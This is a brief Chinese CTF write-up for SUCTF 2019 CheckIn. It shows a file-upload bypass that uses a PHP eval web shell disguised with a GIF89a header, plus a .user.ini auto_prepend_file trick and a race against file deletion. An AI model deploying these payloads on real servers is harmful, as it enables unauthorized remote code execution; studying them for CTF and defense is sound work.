[SUCTF 2019]CheckIn 1

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>
  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
独行soc5 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
风间琉璃""6 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行7 小时前
【DSVW】攻防实战全记录
web安全·网络安全
安全方案8 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全
索然无味io9 小时前
跨站请求伪造之基本介绍
前端·笔记·学习·web安全·网络安全·php
Hacker_Oldv9 小时前
网络安全中常用浏览器插件、拓展
安全·web安全
网络安全(king)10 小时前
网络安全设备
网络·web安全·php
hao_wujing12 小时前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.12 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全